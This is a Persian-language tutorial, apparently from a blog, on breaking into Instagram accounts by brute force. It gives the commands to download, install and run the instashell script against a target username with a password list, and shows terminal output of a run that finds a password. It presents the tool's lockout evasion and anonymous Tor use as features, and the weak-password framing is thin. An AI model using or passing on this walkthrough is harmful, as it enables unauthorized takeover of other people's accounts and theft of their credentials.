Instagram یک شبکه اجتماعی محبوب عکس و ویدئو است که متعلق به شرکت فیس بوک می باشد. این شرکت توسط کوین سیستورم و مایک کریگر ساخته شده است و اولین نسخه آن در اکتبر ۲۰۱۰ به طور انحصاری در iOS راه اندازی شد و بعد از ۶ ماه نسخه آندروید آن نیز منتشر شد. با محبوبیت بیشتر این شبکه اجتماعی، هکرهای زیادی نیز برای استفاده از آن به وجود آمدند. امروزه روش های مختلفی برای هک کردن این شبکه اجتماعی به چشم ما خورده است که در لیست زیر به آنها اشاره میکنم:
- حملات مهندسی اجتماعی یا فیشینگ
- حملات بروت فورس
- حمله به روش فوتوشاپ(استفاده از قابلیت ریپورت پیج های هک شده برای هک یک پیج)
- و …
در این آموزش، ما قصد داریم روی روش بوت فورس کار کنیم و ببینیم که اگر اکانتی از یک پسورد ضعیف استفاده کند، چه اندازه در خطر هک شدن قرار میگیرد. ابزار های زیادی برای این کار به وجود اومدن که هر کدوم انها دارای نقص هایی بودند. برای مثال پشتیبانی ابزار از پروکسی تور میتواند یک قابلیت مهم باشد که فقط ابزارهای محدودی این قابلیت را دارند. در این آموزش از یک اسکریپت به نام instashell استفاده خواهیم کرد که توسط زبان برنامه نویسی bash توسعه داده شده است. instashell یک اسکریپت قوی است که میتواند حملات بروت فورس را بر روی Instagram انجام دهد، این اسکریپت می تواند از محدودیت های ورود عبور کند و تعداد نامحدودی از کلمات عبور را با سرعت خیلی زیاد بر روی اکانت تارگت تست کند.
امکانات اسکریپت Instashell
- پشتیبانی از Multi-thread
- دارای قابلیت رزیوم یا ادامه
- انجام حملات ناشناس از طریق TOR
- بررسی اکانت های معتبر
- دارای پسوردلیست پیش فرض (۸ حرفی)
- نصب تمام پیش نیاز ها به صورت خودکار
ما این آموزش رو بر روی سیستم عامل کالی لینوکس انجام میدیم ولی شما میتونید روی هر سیستم عامل لینوکسی دیگر انجام دهید. ابتدا ابزار مربوطه رو با دستور زیر از گیت هاب دانلود میکنیم.
git clone https://github.com/thelinuxchoice/instashell.git
root@kali:~desktop# git clone https://github.com/thelinuxchoice/instashell.git
cloning into 'instashell'...
remote :enumerating objectes: 6, done.
remote :counting objects: 100% )6/6), done.
remote : compressing objects: 100% (4/4), done.
remote : Total 168 (delta 2), reused 6 ( delta 2), pack-reused 162
Receiving objects : 100% (168/168), 820.08 KiB | 762.00 KiB/s, done.
Receiving deltas: 100% (94/94), done.
root@kali:~desktop#
سپس به ترتیب دستورات زیر را وارد میکنیم تا وارد پوشه دانلود شده و مجوزهای لازم را برای ابزار فعال کنیم.
cd instashell
chmod +x install.sh
./install.sh
chmod +x instashell.sh
./instashell.sh
سپس به ترتیب یوزر نیم تارگت و پسورد لیست خود را وارد میکنیم و تعداد ترد ها را بر اساس سرعت اینترنت خود تنظیم میکنیم.
در نهایت این ابزار میتواند تعدادی نامحدودی از پسورد را بدون بلاک شدن ایپی شما تست کند و اگر پسورد تارگت شما درون پسوردلیست شما وجود داشت آنرا برای شما پیدا کند
root@kali:~desktop/instashell# ./instashell.sh
Instagram Brut Forcer V1.5.5 Author: @Linux_choice (Github/IG)
Username account: NETK
Password List (Enter to default List): /root/Desktop/passList.tet
Threads (Use < 20, default 10) : 5
Username: NETK
WordList: /root/Desktop/passlist.txt (40)
[*] press ctel + c to stop or save session
Trying pass (1/40): ambo1370
Trying pass (2/40): fatiw12345
Trying pass (3/40): ronesa1234
Trying pass (4/40): gorbe1999
Trying pass (5/40): sagsag12370
Trying pass (6/40): jesijesi
Trying pass (7/40): rehlate
Trying pass (8/40): tehran021
.
.
.
Trying pass (33/40):123456
Trying pass (34/40): *****
Trying pass (35/40):1234567
[*] password found: *****
[*] challeng required
[*] saved: found.instashell
Hangup
root@kali:~desktop/instashell#
خب همونطور که در تصویر پایین میبینید پسورد رو بعد از ۳۵ بار تلاش برای ما پیدا کرد.
هنوز بررسیای ثبت نشده است.